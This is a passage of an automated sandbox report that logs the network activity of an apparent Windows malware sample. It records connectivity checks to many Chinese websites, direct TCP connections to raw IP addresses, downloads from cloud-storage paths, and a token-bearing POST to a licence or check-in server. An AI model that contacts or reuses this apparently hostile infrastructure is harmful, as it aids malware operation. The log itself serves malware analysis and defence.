          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.hao123.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.eastmoney.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.jmw.com.cnRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.tencent.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.cdstm.cnRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.cctv.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.hupu.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2024-08-06/16_27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: zhangjiakoucs.oss-accelerate.aliyuncs.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /operate/24624 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /operate/24624 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /operate/24647 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /operate/24647 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.87.7
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.30.151
          Source: unknownTCP traffic detected without corresponding DNS query: 47.242.126.205
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.87.7
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.87.7
          Source: unknownTCP traffic detected without corresponding DNS query: 8.212.11.147
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.30.151
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.30.151
          Source: unknownTCP traffic detected without corresponding DNS query: 47.242.126.205
          Source: unknownTCP traffic detected without corresponding DNS query: 47.242.126.205
          Source: unknownTCP traffic detected without corresponding DNS query: 8.212.11.147
          Source: unknownTCP traffic detected without corresponding DNS query: 8.212.11.147
          Source: unknownTCP traffic detected without corresponding DNS query: 47.242.126.205
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.30.151
          Source: unknownTCP traffic detected without corresponding DNS query: 47.242.126.205
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.87.7
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.87.7
          Source: unknownTCP traffic detected without corresponding DNS query: 8.212.11.147
          Source: unknownTCP traffic detected without corresponding DNS query: 8.212.11.147
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.30.151
          Source: unknownTCP traffic detected without corresponding DNS query: 8.212.11.147
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.87.7
          Source: unknownTCP traffic detected without corresponding DNS query: 8.212.11.147
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.87.7
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.30.151
          Source: unknownTCP traffic detected without corresponding DNS query: 47.242.126.205
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.30.151
          Source: unknownTCP traffic detected without corresponding DNS query: 47.242.126.205
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.30.151
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.87.7
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.87.7
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.87.7
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.87.7
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.87.7
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.87.7
          Source: unknownTCP traffic detected without corresponding DNS query: 8.218.87.7
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
          Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
          Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
          Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
          Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
          Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
          Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
          Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
          Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
          Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
          Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
          Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
          Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E8E1F0 _memset,select,select,recv,_strncmp,_swscanf,_swscanf,2_2_69E8E1F0
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Aug 2024 08:29:15 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeLast-Modified: Sun, 21 Jan 2024 01:11:31 GMTETag: "a2f-60f6a64bbb3b1-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 1334Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 56 6d 6b db 56 14 fe 1e c8 7f b8 a8 0c da 0f b6 24 bf c5 96 6c 43 92 c6 8d 21 6b a1 0b 8c ed cb 90 ad 6b 5b ab 2c b9 d2 75 9d 17 fa 63 1c d1 35 ac d9 16 37 75 d2 d8 4e 9b 26 69 ea 66 c4 76 1a 47 eb 0b 14 ca 46 19 83 0c 5a 4a 53 c2 3a 76 af 22 c7 76 93 76 ed 98 6d cc d5 bd cf 3d e7 3c cf 3d e7 5c 05 f5 b8 26 65 50 18 90 4f 6f 8f 20 43 0d 9d a4 36 a7 cd ef 8d d2 cd 46 a3 dc 58 59 ae 6f af 96 af 3e 28 9b 85 f9 e6 6c b3 71 ef e6 b4 b9 5f 5c 33 af ce 99 c6 4c fd e9 46 c1 dc b9 bf 7b 7b ba fc e7 fc 4f c6 cc 6a f9 7a ad b2 5d 5c fb e5 ca d2 ab f2 7e f9 99 31 d3 fc a1 f2 c4 13 08 9c 3f 40 e1 1d 66 f3 b1 59 6e fc ee c6 73 c6 4c f1 d7 f2 de 62 69 e5 e5 9d 1b 4b db 5b f9 03 8c 79 f5 e6 3c 75 8a 3f 8c a5 e5 73 e3 71 75 ba be bf f1 64 f3 cd ce 2d a3 94 cb e5 9c 31 61 4c 52 92 89 09 67 5c 4d 83 8e 89 ec 44 2a 7b 38 e7 67 02 4c fc 62 0b 94 ec 0b f8 ad 91 b5 96 4b ba 18 c6 7a b4 1c 06 69 5b 0c 3c d4 d1 b8 0c 01 1a cf c0 10 85 e0 18 a2 e3 ba 4e 85 89 44 31 55 1c 9f 4c a8 0a 72 24 84 b4 24 8f 73 a0 36 55 dd dd ba 5b 7a cc c7 84 f8 85 a4 a6 66 15 91 3b 11 f1 44 bc 91 3e 3e 2d 68 49 49 e1 98 cb 64 2b 76 a5 20 a8 a0 c9 9c 24 a2 14 c7 32 cc 67 7c 5c 95 55 8d 3b 91 48 24 f8 84 ac 0a 88 93 61 02 d9 db 1c 9a 94 4c 21 ce e1 f2 30 99 b1 03 0b 92 a2 40 6d 32 05 ad 05 d6 8d e7 bb b1 2c 41 b6 70 c0 39 c6 4e 66 04 51 c4 aa 70 78 01 b0 ae 36 1e a9 19 0b cd b7 e1 c2 24 a1 ea 10 61 5c d5 04 24 a9 0a a7 a8 0a e4 2d b2 ba 34 01 39 d6 87 f1 c0 0e d9 cb fa fa 03 83 3c e8 d8 cf a5 d4 4b 38 bc 63 ad 10 1c 61 a0 4b 22 b4 05 f0 33 c4 7f 8b 4c 80 3c 74 46 eb f1 e3 89 38 d6 0b 6a 1f 96 a9 8b 0a b1 0f 9c b1 36 71 16 9b f2 1e c3 bb c3 4e e7 be 8f 50 c1 df a1 02 89 08 b4 5c 79 89 c6 c4 36 e8 4a 85 88 cf c7 30 3c b0 2c e4 0e d8 c6 54 59 c4 28 55 13 a1 e6 d0 04 51 ca ea 9c e7 1d 06 ff a2 67 97 8b 81 fe 01 c6 d7 15 94 2d 77 42 55 51 3b 63 5c c4 47 07 e8 fd 19 4b 32 e5 72 db 00 fb e9 16 58 af 6d 02 38 e3 32 14 b4 49 eb 1f 33 47 29 6b 16 97 1b 29 32 ab a8 c8 0f 7f 82 74 0a 0a a2 35 13 24 75 06 54 c5 2a 99 31 94 86 4a 36 44 69 10 65 35 05 24 04 59 87 3c 85 57 75 28 c3 38 d2 91 a0 a1 ee 55 0a e0 5a 56 65 39 a4 a8 61 62 3b 28 4a 97 40 5c 16 74 3d 44 d9 55 78 50 ce 56 e3 eb 5a b6 09 53 e1 20 26 72 31 0b a1 6d 4a 48 63 96 28 e4 05 31 98 12 2e 49 aa 16 a2 04 19 23 15 01 61 77 91 73 67 47 81 45 28 44 91 b1 e3 8b e8 d7 43 1c 70 31 19 c4 83 48 74 64 74 e8 3c 07 f4 94 20 aa b9 de 9e de 9e 93 96 84 a1 98 8c e5 3b c5 83 2f a3 a7 47 87 39 60 75 04 30 78 6e e4 1c 06 9f f0 30 fd fe 7e 37 0f 46 a2 67 87 1c c3 43 d1 33 c3 a3 18 e2 72 63 88 e5 21 d2 ff 79 74 e4 ab 76 ff c1 11 0f 84 1d 60 e3 c7 b5 3f 48 c3 5c 5f b8 bb 0e 1c a0 d5 3f f1 70 e3 ed e6 cb 1b d7 d6 9f 6f 3e af 3c
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: vip.baxingfz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.baidu.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.qq.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.sina.com.cnRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.jd.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.sogou.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.so.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: youdao.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.1688.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: soso.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.hao123.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.eastmoney.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.jmw.com.cnRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.cdstm.cnRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: foodmate.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.tencent.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.hupu.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.cctv.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2024-08-06/16_26 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: xianggangcs.oss-accelerate.aliyuncs.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.jb51.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.autohome.com.cnRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.zhihu.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /operate/18771 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kss_admin/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNHost: yanzheng.appchizi.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kss_admin/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNHost: yanzheng.appchizi.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kss_admin/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNHost: yanzheng.appchizi.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kss_admin/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNHost: yanzheng.appchizi.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /operate/11133 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.kuaishou.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.sogou.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.douyin.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.sohu.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.qq.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.sina.com.cnRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.baidu.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.so.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: soso.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.jd.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.1688.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: youdao.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: foodmate.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.hao123.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.eastmoney.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.jmw.com.cnRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.tencent.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.cdstm.cnRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.cctv.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.hupu.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2024-08-06/16_27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: zhangjiakoucs.oss-accelerate.aliyuncs.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /operate/24624 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /operate/24624 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /operate/24647 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /operate/24647 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: vip.baxingfz.com
          Source: global trafficDNS traffic detected: DNS query: www.sogou.com
          Source: global trafficDNS traffic detected: DNS query: www.qq.com
          Source: global trafficDNS traffic detected: DNS query: www.sina.com.cn
          Source: global trafficDNS traffic detected: DNS query: www.so.com
          Source: global trafficDNS traffic detected: DNS query: www.baidu.com
          Source: global trafficDNS traffic detected: DNS query: soso.com
          Source: global trafficDNS traffic detected: DNS query: www.jd.com
          Source: global trafficDNS traffic detected: DNS query: www.1688.com
          Source: global trafficDNS traffic detected: DNS query: www.hao123.com
          Source: global trafficDNS traffic detected: DNS query: youdao.com
          Source: global trafficDNS traffic detected: DNS query: foodmate.net
          Source: global trafficDNS traffic detected: DNS query: www.jmw.com.cn
          Source: global trafficDNS traffic detected: DNS query: www.cdstm.cn
          Source: global trafficDNS traffic detected: DNS query: www.eastmoney.com
          Source: global trafficDNS traffic detected: DNS query: www.tencent.com
          Source: global trafficDNS traffic detected: DNS query: www.cctv.com
          Source: global trafficDNS traffic detected: DNS query: www.hupu.com
          Source: global trafficDNS traffic detected: DNS query: www.autohome.com.cn
          Source: global trafficDNS traffic detected: DNS query: www.jb51.net
          Source: global trafficDNS traffic detected: DNS query: xianggangcs.oss-accelerate.aliyuncs.com
          Source: global trafficDNS traffic detected: DNS query: www.zhihu.com
          Source: global trafficDNS traffic detected: DNS query: sinacloud.net
          Source: global trafficDNS traffic detected: DNS query: www.douyin.com
          Source: global trafficDNS traffic detected: DNS query: www.kuaishou.com
          Source: global trafficDNS traffic detected: DNS query: www.iqiyi.com
          Source: global trafficDNS traffic detected: DNS query: www.sohu.com
          Source: global trafficDNS traffic detected: DNS query: zhangjiakoucs.oss-accelerate.aliyuncs.com
          Source: unknownHTTP traffic detected: POST /kss_io/io.php?v=13&b=1&s=10000002&e=get&line=1kstoken80597805589 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Accept-Language: zh-cnReferer: http://yanzheng.appchizi.com/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; )Content-Length: 126Host: yanzheng.appchizi.com
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://1066951243755853.cn-hongkong.fc.aliyuncs.com/2016-08-15/proxy/time.LATEST/time/
